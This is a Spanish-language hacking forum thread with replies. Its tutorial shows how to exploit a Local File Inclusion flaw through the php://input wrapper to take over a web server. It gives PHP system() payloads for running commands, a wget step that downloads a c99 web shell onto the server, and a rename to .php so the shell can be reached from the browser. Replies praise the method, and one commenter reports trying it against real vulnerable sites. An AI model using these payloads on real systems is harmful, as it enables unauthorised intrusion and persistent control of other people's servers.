Subiendo Shell Explotando LFI via PHP:INPUT

Iniciado por CalebBucker, Julio 14, 2012, 11:53:18 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Julio 14, 2012, 11:53:18 PM Ultima modificación: Noviembre 23, 2014, 01:20:10 PM por Expermicid

Hola, esta vez les dejare un tutorial, la cual consiste en subir una SHELL explotando la vulnerabilidad LFI via "php:input" , solo basta con inyectar algunos códigos para obtener la misma.

Que es el LFI?

Es una falla en la programacion de una aplicacion; falla mediante la cual se pueden incluir archivos que se encuentren en el servidor como por ejemplo el /etc/passwd o algun otro archivo de configuracion que nos provea de informacion para atacar el sitio.

Ahora bien, empecemos...

Algunos de los sitios webs vulnerables a LFI, tienen este aspecto:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
www.sitio-web.com/index.php?file=


Ahora bien... para comprobar si realmente el sitio web es vulnerable a LFI, tenemos que ver si la web puede leer el "etc/passwd" cosa que el sitio web quedaría de la siguiente forma:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Si el sitio web puede leer dicho código, la web quedaría asi:


Como vemos en la imagen, ya comprobamos que el sitio web es vulnerable a LFI.

Ahora, haremos el siguiente paso, para subir una shell al servidor.

Necesitaremos lo siguiente:

Navegador: Firefox
Addon: HackBar


Ahora vamos a tratar de poner este método en acción.

Cargamos la url vulnerable al HackBar e inyectamos el No tienes permitido ver los links. Registrarse o Entrar a mi cuenta la cual quedaría asi:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Habilitamos el "Enable Post data" y colocamos el siguiente comando:

<? system('uname -a'); ?>

Ejemplo:


Otros comandos:

Lista de directorios
<? system ('ls'); ?>

Identificación
<? system ('id'); ?>

Convertir el formato
<? system ('mv file.txt file.php'); ?>

Descargar
<? system ('wget'); ?>


Ahora, vamos a utilizar el comando <? system ('wget'); ?> para descargar alguna shell en el sitio.

Utilizaremos esta shell en .txt: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

<? system ('wget No tienes permitido ver los links. Registrarse o Entrar a mi cuenta'); ?>



Ahora, comprobaremos si la shell se descargo perfectamente, ejecutando el siguiente comando:

<? system ('ls'); ?>

Si la shell, se descargo perfectamente, en este caso lo veremos como c99.txt


Ahora, como ya sabemos que nuestra shell se ejecuto perfectamente, tenemos que cambiarle el formato a .php para poder ingresar a la misma desde el navegador, solo basta con colocar el siguiente comando:

<? system ('mv c99.txt calebbucker.php'); ?>



Ahora, listamos nuevamente los directorios y apreciaremos nuestra shell en .php


Ahora, en este caso nos dirigimos a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y Voila tenemos nuestra shell!!


No Entendistes?

Observa el VideoTutorial en 1080p HD!


Espero te sirva y lo uses con prudencia.

Saludos.
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Excelente tutorial :)
Pentest - Hacking & Security Services

Contact me: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Estuve probando con varias paginas vulnerables a lfi pero ninguna de ellas pude hacer el No tienes permitido ver los links. Registrarse o Entrar a mi cuenta :(
Aunque fueran por post me puse a mirar con el http live headers para ver si se enviaba por post correctamente y si! habia unas paginas que no me tiraban nada, otras que me tiraban un error de file stream open, es decir, que no se podia abrir un archivo en php xD!, tambien cuando no me salia nada me fije en el codigo ctrl+u para ver si estaba algo pero nada, a lo mejor es por que ya solucionaron este bug? bueno igual puede aver alguno igual me sirvio para aprender :D
Pentest - Hacking & Security Services

Contact me: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Grande Caleb, buen tuto te montaste ;)
Twitter: @The_Pr0ph3t
[email protected]

Pedazo de tutorial, me encanto  ;D

-Saludos-

Exelente Aporte!

Entonces él dijo, "cruzad con vuestras tropas y atacad porque es lo único que le queda a nuestro pueblo...".

Se te olvido decir que para utlizar el wrapper No tienes permitido ver los links. Registrarse o Entrar a mi cuenta las directivas allow_url_include y allow_url_fopen tienen que estar ON, por consiguiente dicho LFI se convertiria en un RFI, y seria al pedo ejecutar comando de esa manera puediendo incluir directamente una shell a travez de la url.

Buen post igual!  ;) 
Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Twitter: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Excelente Aporte  Caleb  ;)

salu2  ;D
____________________________

my best crime is myself

Muy bueno conocia el de Tamper Data injectar en el request la shell..

Te Hago una pregunta muchas veces he encontrado sitios a los cuales les hago esta inyeccion en un campo ejemplo:

download.php?id=/etc/passwd

Si y cuando hago esto me descarga el archivillo con toda la info a mi equipo, me confunde algo este tipo de inyeccion y no sabria si al inyectar la shell en ves de alojarla en el servidor me la descargue al equipo, no he vuelto a encontrar sitios asi como para probar con HackBar

Muchas Gracias por tus Buenos Aportes


exelente ya lo voy a llevar a la practica!
El futuro pertenece a quienes creen en la belleza de sus sueños